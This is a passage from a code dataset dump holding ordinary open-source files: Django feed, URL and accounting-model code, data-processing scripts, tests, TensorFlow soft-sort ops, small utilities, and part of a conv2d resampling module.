'licensed', 'format'\n ).prefetch_related(\n Prefetch('chapters', queryset=chapters)\n ).get(slug=slug)\n\n def link(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the link of the feed's page.\n\n :param obj: The object of the feed.\n\n :return: The URL of the series, or the home page.\n \"\"\"\n return obj.get_absolute_url() if obj else '/'\n\n def title(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the title of the feed.\n\n :param obj: The object of the feed.\n\n :return: The title of the series, or ``Releases``.\n \"\"\"\n title = obj.title if obj else 'Releases'\n return f'{title} - {self.author_name}'\n\n def description(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the description of the feed.\n\n :param obj: The object of the feed.\n\n :return: A description with the title of the series, if available.\n \"\"\"\n if obj is None:\n return 'Updates when a new chapter is added'\n if obj.licensed: # pragma: no cover\n return 'This series is licensed.'\n return f'Updates when a new chapter of {obj.title} is added'\n\n def items(self, obj: Optional[Series]) -> Iterable[Chapter]:\n \"\"\"\n Get an iterable of the feed's items.\n\n :param obj: The object of the feed.\n\n :return: An iterable of ``Chapter`` objects.\n \"\"\"\n if getattr(obj, 'licensed', False): # pragma: no cover\n return []\n if hasattr(obj, 'chapters'):\n return list(obj.chapters.all()) # type: ignore\n return Chapter.objects.only(\n 'title', 'volume', 'number', 'published', 'modified',\n 'series__slug', 'series__title', 'series__format'\n ).select_related('series').filter(\n published__lte=tz.now(), series__licensed=False\n ).order_by('-published')[:_max]\n\n def item_description(self, item: Chapter) -> str:\n \"\"\"\n Get the description of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The ``Chapter`` object as a string.\n \"\"\"\n desc = str(item)\n if settings.CONFIG['ALLOW_DLS']:\n domain = settings.CONFIG['DOMAIN']\n url = item.get_absolute_url()[:-1] + '.cbz'\n scheme = settings.ACCOUNT_DEFAULT_HTTP_PROTOCOL\n desc = f'{desc}'\n return desc\n\n def item_pubdate(self, item: Chapter) -> datetime:\n \"\"\"\n Get the publication date of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The date the chapter was published.\n \"\"\"\n return item.published\n\n def item_updateddate(self, item: Chapter) -> datetime:\n \"\"\"\n Get the update date of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The date the chapter was modified.\n \"\"\"\n return item.modified\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass ReleasesAtom(ReleasesRSS):\n \"\"\"Atom feed for chapter releases.\"\"\"\n feed_type = Atom1Feed\n subtitle = ReleasesRSS.description\n\n\n__all__ = ['LibraryRSS', 'LibraryAtom', 'ReleasesRSS', 'ReleasesAtom']\n","sub_path":"reader/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"471947962","text":"import os.path\nfrom argparse import ArgumentParser\nfrom typing import Iterable, Dict, Any, List\nfrom random import random\nfrom collections import Counter\n\nfrom utils.constants import INPUTS, SAMPLE_ID, OUTPUT, SMALL_NUMBER, TIMESTAMP\nfrom utils.file_utils import iterate_files, read_by_file_suffix\nfrom utils.data_writer import DataWriter\n\n\nLABEL = 'label'\nLABELS = 'labels'\nFREQ = 0.01 # This is a parameter of the dataset\n\n\ndef from_sensor(label: str, sensors: List[str]) -> bool:\n for sensor in sensors:\n if label.startswith(sensor):\n return True\n return False\n\n\ndef get_data_iterator(input_folder: str, sensors: List[str]) -> Iterable[Dict[str, Any]]:\n data_files = iterate_files(input_folder, pattern='.*jsonl.gz')\n for data_file in data_files:\n for sample in read_by_file_suffix(data_file):\n data_dict: Dict[str, Any] = dict()\n data_dict[OUTPUT] = sample[LABEL]\n data_dict[INPUTS] = [val for key, val in sorted(sample.items()) if from_sensor(key, sensors)]\n data_dict[TIMESTAMP] = sample[TIMESTAMP]\n yield data_dict\n\n\ndef majority(labels: List[int]) -> int:\n label_counter: Counter = Counter()\n for label in labels:\n label_counter[label] += 1\n return label_counter.most_common(1)[0][0]\n\n\ndef tokenize_data(input_folder: str,\n output_folder: str,\n window: int,\n stride: int,\n skip_labels: List[int],\n sensors: List[str],\n file_prefix: str,\n chunk_size: int,\n sample_frac: float):\n \"\"\"\n Function to tokenize activity datasets.\n \"\"\" \n data_iterator = get_data_iterator(input_folder, sensors=sensors)\n\n with DataWriter(output_folder, file_prefix=file_prefix, file_suffix='jsonl.gz', chunk_size=chunk_size) as writer:\n\n sample_id = 0\n data_window: List[Dict[str, Any]] = []\n stride_counter = stride\n label_counter = Counter()\n\n for data_index, data_sample in enumerate(data_iterator):\n # Skip data according to the stride policy\n if stride_counter < stride:\n stride_counter += 1\n continue\n\n # Create windows of sufficient size and validate timestamps\n if len(data_window) == 0:\n data_window.append(data_sample)\n elif abs(data_sample[TIMESTAMP] - data_window[-1][TIMESTAMP]) > FREQ + SMALL_NUMBER:\n data_window = [data_sample]\n else:\n data_window.append(data_sample)\n\n if len(data_window) == window:\n labels = [elem[OUTPUT] for elem in data_window]\n label = majority(labels)\n\n element = {\n SAMPLE_ID: sample_id,\n INPUTS: [sample[INPUTS] for sample in data_window],\n OUTPUT: label,\n LABELS: labels,\n TIMESTAMP: data_window[-1][TIMESTAMP]\n }\n\n # Perform sample filtering\n r = random()\n if (skip_labels is None or label not in skip_labels) and r < sample_frac:\n writer.add(element)\n sample_id += 1\n stride_counter = 0\n label_counter[label] += 1\n\n # Reset the data window\n data_window = []\n\n if (sample_id + 1) % chunk_size == 0:\n print(f'Completed {data_index + 1} samples.', end='\\r')\n\n print()\n print(f'Completed processing. Total of {sample_id + 1} samples')\n print('Label Distribution:')\n for key, val in sorted(label_counter.items()):\n frac = val / sample_id\n print(f'{key}: {val} ({frac:.3f})')\n\n\nif __name__ == '__main__':\n parser = ArgumentParser('Script to create tokenized activity datasets.')\n parser.add_argument('--input-folder', type=str, required=True)\n parser.add_argument('--output-folder', type=str, required=True)\n parser.add_argument('--window', type=int, required=True)\n parser.add_argument('--stride', type=int, required=True)\n parser.add_argument('--skip-labels', type=int, nargs='*')\n parser.add_argument('--sensors', type=str, nargs='+', choices=['hand', 'chest', 'ankle'])\n parser.add_argument('--file-prefix', type=str, default='data')\n parser.add_argument('--chunk-size', type=int, default=5000)\n parser.add_argument('--sample-frac', type=float, default=1.0)\n args = parser.parse_args()\n\n # Validate arguments\n assert os.path.exists(args.input_folder), f'The folder {args.input_folder} does not exist!'\n assert 0 < args.sample_frac and args.sample_frac <= 1.0, 'The sample fraction must be in the range (0, 1]'\n assert args.window > 0, 'Must have a positive window size'\n assert args.stride > 0, 'Must have a positive stride'\n\n tokenize_data(input_folder=args.input_folder,\n output_folder=args.output_folder,\n window=args.window,\n stride=args.stride,\n skip_labels=args.skip_labels,\n sensors=args.sensors,\n file_prefix=args.file_prefix,\n chunk_size=args.chunk_size,\n sample_frac=args.sample_frac)\n","sub_path":"src/data_generation/activity/tokenize_activity_data.py","file_name":"tokenize_activity_data.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530081126","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='users'),\n path('users/', detail, name='user'),\n path('create', create, name='create_user'),\n path('edit/', edit, name='edit_user'),\n path('delete/', delete_user, name='delete_user'),\n\n]","sub_path":"sprint_14-18_[django,orm,view,templates,forms,REST]/Library App/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179695268","text":"import re\r\n\r\nprevious=0\r\nrun=True\r\n\r\ndef perform_math():\r\n global run\r\n global previous\r\n equation=\"\"\r\n if previous==0:\r\n equation=input(\"Enter Equation:\")\r\n else:\r\n equation=input(str(previous))\r\n if equation==\"quit\":\r\n run=False\r\n else:\r\n equation=re.sub('[^0-9^+^-^*^/]','',equation)\r\n if previous==0:\r\n previous = eval(equation)\r\n else:\r\n previous=eval(str(previous)+equation)\r\n\r\n print(equation)\r\n\r\n\r\nwhile run:\r\n perform_math()\r\n","sub_path":"BasicCalculator/Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"303239955","text":"import pytest\nfrom pyramid.testing import DummyRequest\nfrom webob.multidict import MultiDict\n\nfrom airflight.views.api.v1.flight.exceptions import \\\n OriginIsTheSameAsTheDestination\n\n\nclass TestAPIFlight:\n def test_get_route_without_connections(self, app, data):\n \"\"\"\n Get best route without connections when the airline is United Airlines\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'ANK'), ('destination', 'YYZ')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 1\n assert get_route['data'][0]['airline'] == {'name': 'United Airlines',\n '2_digit_code': 'UA',\n '3_digit_code': 'UAL',\n 'country': 'United States'}\n\n def test_get_route_with_two_connections(self, app, data):\n \"\"\"\n Get best route with two connections when the airlines origin is\n United Airlinesand the connection is Turkish Airlines\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'ANK')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 2\n assert get_route['data'][0]['airline'] == {'name': 'United Airlines',\n '2_digit_code': 'UA',\n '3_digit_code': 'UAL',\n 'country': 'United States'}\n\n assert get_route['data'][1]['airline'] == {'name': 'Turkish Airlines',\n '2_digit_code': 'TK',\n '3_digit_code': 'THY',\n 'country': 'Turkey'}\n\n def test_get_route_when_exist_two_different_routes(self, app, data):\n \"\"\"\n Test when exist different routes\n Route 1: (YWH -> YYZ) -> (YYZ -> ANK) -> (ANK -> ADA)\n Route 2: (YWH -> ADA)\n\n In this case the system chooses Route 2\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'ADA')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 1\n\n def test_get_route_origin_is_the_same_as_destination(self, app):\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'YWH')])\n with pytest.raises(OriginIsTheSameAsTheDestination):\n FlightAPI(req).get_best_route()\n","sub_path":"airflight/tests/views/api/v1/flight/test_flight.py","file_name":"test_flight.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"252455183","text":"import numpy, math\n\ndef gaussianReduction(vectors):\n if len(vectors)==2:\n v1=numpy.array(vectors[0])\n v2=numpy.array(vectors[1])\n while True:\n if numpy.dot(v2,v2) < numpy.dot(v1,v1):\n tmp = v1\n v1 = v2\n v2 =tmp\n m = math.floor(numpy.dot(v2,v1)/numpy.dot(v1,v1))\n if m==0:\n return [v1,v2]\n v2 = v2 - m*v1\n else:\n print(\"You must supply an array containing 2 vectors\")\n\nreducted = gaussianReduction( [[87502093, 123094980], [846835985, 9834798552]] )\nr1 = reducted[0]\nr2 = reducted[1]\nprint(r1[0]*r2[0]+r1[1]*r2[1])\nprint(numpy.dot(r1,r2))\n","sub_path":"old/gaussian lattice reduction.py","file_name":"gaussian lattice reduction.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"411408854","text":"# From Django\nfrom django.utils.translation import ugettext_lazy as _ # To mark strings for translations\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save, pre_delete\n\n# Our modules\nfrom infra.models.record_owner import RecordOwner\nfrom common.models.app_entity import AppEntity\nfrom infra.custom.fields import CodeField, CharNullField, DescriptionField\nfrom infra.custom.audit_handlers import audit_update_handler, audit_add_handler, audit_delete_handler\nfrom common.models.currency import Currency\nfrom common.models.forex import ForexDealer\nfrom bin.constants import WORD_SEPARATOR\n\nclass Company(AppEntity):\n \"\"\"\n Companies of the Organisation using this Application.\n\n A Company will own a Set of Books in Accounting. This maps\n to the company segment in most General Ledger systems.\n A Company in turn may have 1 or more Profit Centres, each\n of which may map to 0 or more Branches. A Branch has a\n 1 to 1 mapping with Business Unit. A User must belong to a\n Business Unit, which may be a Branch (leaf-node) or a parent\n of 1 or more Branches. In the former case, he has a single\n Company to post his transactions to while the latter allows\n him to choose for each transactions. But in practical cases,\n the Company a transaction belongs to depends on the customer\n Account (ie which Branch it belongs to), not which Branch the\n User belongs to. \n \n Sometimes, it is overridden by Transaction Type. An \n organisation may have several lines of business which\n belongs to different Companies and is carried out in all its Branches.\n An example would be a Bank whose main business is Banking (ie\n Savings, Fixed Deposits etc) but a Branch may also have\n Safe Deposit Box services which is owned by another Company.\n So any transactions of the latter services is posted to \n this other Company even though both types of transaction\n is captured by the same Application.\n\n The difference between Business Units and Companies is that\n the former represents the Management control of the Organisation\n while the latter is the Accounting control. We would always use\n Business Units for Users, Branches, Accounts etc while the Company\n chosen will always follow the transaction (ie, who owns the transaction).\n \"\"\"\n # unique company code\n company_code = CodeField(verbose_name=_(\"Company Code\"), unique=True)\n # and a name will be from AppEntity\n\n # GL Account Segment for this Company, most GL system will have Chart of Account coding\n # with Co-Div-Dept-Acc structure. This represents to Co part.\n company_account_segment = CharNullField(verbose_name=_(\"Company GL Account\"), max_length=30,\n help_text=_(\"GL Account used for this Company\"))\n # Functional (ie Accounting) Currency for this Company, when null will use AppRegistry(FUNCTIONAL-CURRENCY)\n functional_currency = models.ForeignKey(Currency, verbose_name=_(\"Functional Currency\"), blank=True, null=True,\n help_text=_(\"Functional Currency for accounting of this Company\"))\n # Forex Dealer for exchange rate quotes, when null will use AppRegistry(DEFAULT-FOREX-DEALER)\n forex_dealer = models.ForeignKey(ForexDealer, verbose_name=_(\"Forex Dealer\"), blank=True, null=True,\n help_text=_(\"Exchange rates from this Forex Dealer\"))\n\n class Meta:\n verbose_name = _(\"Company\")\n verbose_name_plural = _(\"Companies\")\n app_label = 'common'\n db_table = 'cm_company'\n\n def __unicode__(self):\n return self.entity_name\n\n def save(self, force_insert=False, force_update=False):\n # Set Entity Type\n self.entity_type = 'CO'\n # Perform the actual save\n super(Company, self).save(force_insert, force_update)\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=Company)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=Company)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=Company)\n\nclass ProfitCentre(RecordOwner):\n \"\"\"\n Profit Centres within each Company. \n \n If a Company has branches, then each branch should be a Profit Centre.\n Other Profit Centres may be by line of business, eg Product Divisions.\n\n The Headquarters Clearing Account is used for Inter-Branch transactions.\n When Branch A collects payment against its own Bill, it will\n Dr Bank and Cr Debtor. When it collects payment for Branch B's Bill, it\n will Dr Bank and Cr Branch A HQ Clr Account and generate another set of\n entries, Dr Branch B HQ Clr Account and Cr Debtor. At the end of the\n day, week or month, each Branch will settle with HQ its clearing balances.\n If in Cr, then the Branch will have to pay HQ.\n \"\"\"\n # Profit Centre is within a Company\n company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name=_(\"Company\"))\n # Unique code within company\n profit_centre_code = CodeField(verbose_name=_(\"Profit Centre Code\"))\n # Description\n centre_description = DescriptionField(verbose_name=_(\"Description\"), \n help_text=_(\"A Description of this Profit Centre\"))\n # Up to 3 GL Account Segments to use for this Profit Centre, eg div-dept-section\n # The full GL Account code is made up of Company-Seg1-Seg2-Seg3-Account\n account_segment_1 = CharNullField(verbose_name=_(\"GL Segment 1\"), max_length=30,\n help_text=_(\"GL Segment 1 code used for this Profit Centre\"))\n account_segment_2 = CharNullField(verbose_name=_(\"GL Segment 2\"), max_length=30,\n help_text=_(\"GL Segment 2 code used for this Profit Centre\"))\n account_segment_3 = CharNullField(verbose_name=_(\"GL Segment 3\"), max_length=30,\n help_text=_(\"GL Segment 3 code used for this Profit Centre\"))\n # Clearing Account with HeadQuarters. See above for explanation. When not maintained, inter-branch\n # transaction must belong to the same Profit Centre, else the GL posting will fail (but the original\n # transaction can be completed normally) until somebody defines this field.\n headquarters_clearing_account = CharNullField(verbose_name=_(\"HQ Clearing Account\"), max_length=30,\n help_text=_(\"Clearing GL Account for this Profit Centre with HeadQuarters\"))\n\n class Meta:\n unique_together = ('company', 'profit_centre_code')\n verbose_name = _(\"Profit Centre\")\n app_label = 'common'\n db_table = 'cm_profit_centre'\n\n def __unicode__(self):\n return unicode(self.company) + WORD_SEPARATOR + self.centre_description\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=ProfitCentre)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=ProfitCentre)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=ProfitCentre)\n\nclass InterCompanyAccount(RecordOwner):\n \"\"\"\n Inter-Company Clearing Accounts for a Profit Centre.\n\n This is used for inter-Company transactions, eg collecting \n payment against a Bill belonging to a customer Account of\n another Branch that belongs to another Company. \n Normally when a Branch of Company A receive payment for its own Bills, \n it will Dr Bank and Cr Debtor but when it receive money \n against Bills of a Branch of Company B, then it needs to \n Dr Bank Cr Company B Clearing Account in its own\n accounts (Company A) and the same transaction will generate \n another set of entries for Company B, ie Dr Company A \n Account and Cr Debtor. At the end of day, week or month,\n there will be a settlement process between clearing and\n and company accounts.\n \"\"\"\n # Profit Centre to define clearing accounts for...\n profit_centre = models.ForeignKey(ProfitCentre, on_delete=models.PROTECT, verbose_name=_(\"Profit Centre\"))\n\n # Clearing Company cannot be the same as Profit Centre\n clearing_company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name=_(\"Clearing Company\"))\n # GL Account within this Profit Centre maintained for Clearing Company. The other GL segments will come\n # from the Profit Centre above.\n clearing_gl_account = CharNullField(verbose_name=_(\"Clearing Account\"), max_length=30,\n help_text=_(\"Clearing GL Account in this Profit Centre for Clearing Company\"))\n # GL Account within Clearing Company maintained for this Profit Centre.\n company_gl_account = CharNullField(verbose_name=_(\"Company Account\"), max_length=30,\n help_text=_(\"GL Account maintained by Clearing Company for this Profit Centre\"))\n\n class Meta:\n unique_together = ('profit_centre', 'clearing_company')\n verbose_name = _(\"Inter-Company Clearing\")\n app_label = 'common'\n db_table = 'cm_inter_company_clearing'\n\n def __unicode__(self):\n return unicode(self.profit_centre) + WORD_SEPARATOR + unicode(self.clearing_company)\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=InterCompanyAccount)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=InterCompanyAccount)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=InterCompanyAccount)\n\n","sub_path":"common/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":9290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554860955","text":"# coding=utf-8\n# Copyright 2019 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This module defines the softranks and softsort operators.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom __future__ import print_function\n\nimport tensorflow.compat.v2 as tf\nfrom soft_sort import soft_quantilizer\n\n\nDIRECTIONS = ('ASCENDING', 'DESCENDING')\n\n\ndef _preprocess(x, axis):\n \"\"\"Reshapes the input data to make it rank 2 as required by SoftQuantilizer.\n\n The SoftQuantilizer expects an input tensor of rank 2, where the first\n dimension is the batch dimension and the soft sorting is applied on the second\n one.\n\n Args:\n x: Tensor of any dimension.\n axis: (int) the axis to be turned into the second dimension.\n\n Returns:\n a Tensor[batch, n] where n is the dimensions over the axis and batch\n the product of all other dimensions\n \"\"\"\n dims = list(range(x.shape.rank))\n dims[-1], dims[axis] = dims[axis], dims[-1]\n z = tf.transpose(x, dims) if dims[axis] != dims[-1] else x\n return tf.reshape(z, (-1, tf.shape(x)[axis]))\n\n\ndef _postprocess(x, shape, axis):\n \"\"\"Applies the inverse transformation of _preprocess.\n\n Args:\n x: Tensor[batch, n]\n shape: TensorShape of the desired output.\n axis: (int) the axis along which the original tensor was processed.\n\n Returns:\n A Tensor with the shape given in argument.\n \"\"\"\n s = list(shape)\n s[axis], s[-1] = s[-1], s[axis]\n z = tf.reshape(x, s)\n\n # Transpose to get back to the original shape\n dims = list(range(shape.rank))\n dims[-1], dims[axis] = dims[axis], dims[-1]\n return tf.transpose(z, dims) if dims[axis] != dims[-1] else z\n\n\n@tf.function\ndef softsort(x, direction='ASCENDING', axis=-1, **kwargs):\n \"\"\"Applies the softsort operator on input tensor x.\n\n This operator acts as differentiable alternative to tf.sort.\n\n Args:\n x: the input tensor. It can be either of shape [batch, n] or [n].\n direction: the direction 'ASCENDING' or 'DESCENDING'\n axis: the axis on which to operate the sort.\n **kwargs: see SoftQuantilizer for possible parameters.\n\n Returns:\n A tensor of the same shape as the input.\n \"\"\"\n if direction not in DIRECTIONS:\n raise ValueError('`direction` should be one of {}'.format(DIRECTIONS))\n\n z = _preprocess(x, axis)\n descending = (direction == 'DESCENDING')\n sorter = soft_quantilizer.SoftQuantilizer(z, descending=descending, **kwargs)\n return _postprocess(sorter.softsort, x.shape, axis)\n\n\n@tf.function\ndef softranks(x, direction='ASCENDING', axis=-1, zero_based=False, **kwargs):\n \"\"\"A differentiable argsort-like operator that returns directly the ranks.\n\n Note that it behaves as the 'inverse' of the argsort operator since it returns\n soft ranks, i.e. real numbers that play the role of indices and quantify the\n relative standing (among all n entries) of each entry of x.\n\n Args:\n x: Tensor of any shape.\n direction: (str) either 'ASCENDING' or 'DESCENDING', as in tf.sort.\n axis: (int) the axis along which to sort, as in tf.sort.\n zero_based: (bool) to return values in [0, n-1] or in [1, n].\n **kwargs: see SoftQuantilizer for possible parameters.\n\n Returns:\n A Tensor of the same shape as the input containing the soft ranks.\n \"\"\"\n if direction not in DIRECTIONS:\n raise ValueError('`direction` should be one of {}'.format(DIRECTIONS))\n\n descending = (direction == 'DESCENDING')\n z = _preprocess(x, axis)\n sorter = soft_quantilizer.SoftQuantilizer(z, descending=descending, **kwargs)\n ranks = sorter.softcdf * tf.cast(tf.shape(z)[1], dtype=x.dtype)\n if zero_based:\n ranks -= tf.cast(1.0, dtype=x.dtype)\n\n return _postprocess(ranks, x.shape, axis)\n","sub_path":"soft_sort/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"617040929","text":"#!/usr/bin/python\n\nimport datetime, math, os, re, sys\n\ndf = '%Y-%m-%d'\nweekdays = ['Su', 'M', 'Tu', 'W', 'Th', 'F', 'Sa']\n\ndef parse_date(s):\n return datetime.datetime.strptime(s, df)\n\ndef format_date(d):\n return d.strftime(df)\n\ndef actual_date(start, weekday, week):\n day_offset = weekdays.index(weekday)\n return start + datetime.timedelta(days=day_offset, weeks=week-1)\n\ndef term_date(start, date):\n diff = (date - start).days\n week = (diff // 7) + 1\n weekday = date.strftime('%A')\n return (week, weekday)\n\ndef ordinal(n):\n # From http://stackoverflow.com/a/20007730\n a = abs(n)\n return \"%d%s\" % (n,\"tsnrhtdd\"[(math.floor(a/10)%10!=1)*(a%10<4)*a%10::4])\n\nstart_date = parse_date(os.environ['OXFORD_TERM_START'])\n\nif len(sys.argv) > 1:\n arg = sys.argv[1]\n date_match = re.match(\"([0-9]{4})-([0-9]{2})-([0-9]{2})\", arg)\n ox_match = re.match(\"(Su|M|Tu|W|Th|F|Sa)([0-9].*)\", arg)\n if date_match:\n week, weekday = term_date(start_date, parse_date(arg))\n print(weekday + \" of \" + ordinal(week) + \" week\")\n elif ox_match:\n weekday = ox_match.group(1)\n week = int(ox_match.group(2))\n print(format_date(actual_date(start_date, weekday, week)))\n else:\n sys.exit(1)\nelse:\n sys.exit(1)\n","sub_path":"oxtermdate.py","file_name":"oxtermdate.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20170677","text":"import os\r\n\r\n# Getting the current work directory (cwd)\r\nthisdir = os.getcwd()\r\nindex =1\r\n# r=root, d=directories, f = files\r\nfor r, d, f in os.walk(thisdir):\r\n for file in f:\r\n if not \".py\" in file:\r\n # if (len(file) < 8):\r\n src = os.path.join(r, file)\r\n dst = os.path.join(r, str(index)+\".jpg\")\r\n print( file, src, dst)\r\n os.rename(src, dst)\r\n index = index + 1\r\n","sub_path":"KB/Machine Learning/code/utils/RenameFiles.py","file_name":"RenameFiles.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307851136","text":"from django.shortcuts import render\r\nfrom .import forms\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n\r\n# return HttpResponse(\"Hie\")\r\n # my_dict = {'insert_me': \"Hello I am from views.py file\"}\r\n return render(request, 'blogpost /index.html')\r\n\r\ndef form_name_view(request):\r\n form = forms.FormName()\r\n if request.method==\"POST\":\r\n form=forms.FormName(request.POST)\r\n if form.is_valid():\r\n print(\"Validation sucess\")\r\n print(\"Name:\" + form.cleaned_data['name'])\r\n print(\"Email:\" + form.cleaned_data['email'])\r\n print(\"Text info:\" + form.cleaned_data['text'])\r\n return render(request,'blogpost/form_page.html',{'form': form})","sub_path":"firstcrud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359515014","text":"# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.\n#\n# NVIDIA CORPORATION and its licensors retain all intellectual property\n# and proprietary rights in and to this software, related documentation\n# and any modifications thereto. Any use, reproduction, disclosure or\n# distribution of this software and related documentation without an express\n# license agreement from NVIDIA CORPORATION is strictly prohibited.\n\n\"\"\"2D convolution with optional up/downsampling.\"\"\"\n\nimport torch\n\nfrom .. import misc\nfrom . import conv2d_gradfix\nfrom . import upfirdn2d\nfrom .upfirdn2d import _parse_padding\nfrom .upfirdn2d import _get_filter_size\n\n#----------------------------------------------------------------------------\n\ndef _get_weight_shape(w):\n with misc.suppress_tracer_warnings(): # this value will be treated as a constant\n shape = [int(sz) for sz in w.shape]\n misc.assert_shape(w, shape)\n return shape\n\n#----------------------------------------------------------------------------\n\ndef _conv2d_wrapper(x, w, stride=1, padding=0, groups=1, transpose=False, flip_weight=True):\n \"\"\"Wrapper for the underlying `conv2d()` and `conv_transpose2d()` implementations.\n \"\"\"\n out_channels, in_channels_per_group, kh, kw = _get_weight_shape(w)\n\n # Flip weight if requested.\n if not flip_weight: # conv2d() actually performs correlation (flip_weight=True) not convolution (flip_weight=False).\n w = w.flip([2, 3])\n\n # Workaround performance pitfall in cuDNN 8.0.5, triggered when using\n # 1x1 kernel + memory_format=channels_last + less than 64 channels.\n if kw == 1 and kh == 1 and stride == 1 and padding in [0, [0, 0], (0, 0)] and not transpose:\n if x.stride()[1] == 1 and min(out_channels, in_channels_per_group) < 64:\n if out_channels <= 4 and groups == 1:\n in_shape = x.shape\n x = w.squeeze(3).squeeze(2) @ x.reshape([in_shape[0], in_channels_per_group, -1])\n x = x.reshape([in_shape[0], out_channels, in_shape[2], in_shape[3]])\n else:\n x = x.to(memory_format=torch.contiguous_format)\n w = w.to(memory_format=torch.contiguous_format)\n x = conv2d_gradfix.conv2d(x, w, groups=groups)\n return x.to(memory_format=torch.channels_last)\n\n # Otherwise => execute using conv2d_gradfix.\n op = conv2d_gradfix.conv_transpose2d if transpose else conv2d_gradfix.conv2d\n return op(x, w, stride=stride, padding=padding, groups=groups)\n\n#----------------------------------------------------------------------------\n\n@misc.profiled_function\ndef conv2d_resample(x, w, f=None, up=1, down=1, padding=0, groups=1, flip_weight=True, flip_filter=False):\n r\"\"\"2D convolution with optional up/downsampling.\n\n Padding is performed only once at the beginning, not between the operations.\n\n Args:\n x: Input tensor of shape\n `[batch_size, in_channels, in_height, in_width]`.\n w: Weight tensor of shape\n `[out_channels, in_channels//groups, kernel_height, kernel_width]`.\n f: Low-pass filter for up/downsampling. Must be prepared beforehand by\n calling upfirdn2d.setup_filter(). None = identity (default).\n up: Integer upsampling factor (default: 1).\n down: Integer downsampling factor (default: 1).\n padding: Padding with respect to the upsampled image. Can be a single number\n or a list/tuple `[x, y]` or `[x_before, x_after, y_before, y_after]`\n (default: 0).\n groups: Split input channels into N groups (default: 1).\n flip_weight: False = convolution, True = correlation (default: True).\n flip_filter: False = convolution, True = correlation (default: False).\n\n Returns:\n Tensor of the shape `[batch_size, num_channels, out_height, out_width]`.\n \"\"\"\n # Validate arguments.\n assert isinstance(x, torch.Tensor) and (x.ndim == 4)\n assert isinstance(w, torch.Tensor) and (w.ndim == 4) and (w.dtype == x.dtype)\n assert f is None or (isinstance(f, torch.Tensor) and f.ndim in [1, 2] and f.dtype == torch.float32)\n assert isinstance(up, int) and (up >= 1)\n assert isinstance(down, int) and (down >= 1)\n assert isinstance(groups, int) and (groups >= 1)\n out_channels, in_channels_per_group, kh, kw = _get_weight_shape(w)\n fw, fh = _get_filter_size(f)\n px0, px1, py0, py1 = _parse_padding(padding)\n\n # Adjust padding to account for 